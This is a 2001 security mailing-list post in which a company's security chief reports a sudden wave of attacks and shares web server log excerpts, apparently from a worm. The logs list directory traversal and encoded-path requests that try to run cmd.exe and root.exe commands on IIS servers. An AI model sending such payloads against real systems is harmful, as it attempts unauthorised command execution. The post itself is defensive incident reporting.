Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

command execution attempts

From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Tue, 18 Sep 2001 09:59:23 -0400
Wow.  This morning we've been hit with a deluge of attempts at
....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here>

My IDS is going haywire.  They're coming from diverse IP's, mostly in the
216.* class A.  This doesn't appear to be a standard code-red type thing.
Have a look at log exerpts...

This all appeared to kick off at roughly 9AM EST.  Have I missed some
prolific worm out there?  

2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -


All of the offending IP's are following this exact pattern, indicating a
worm.  

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: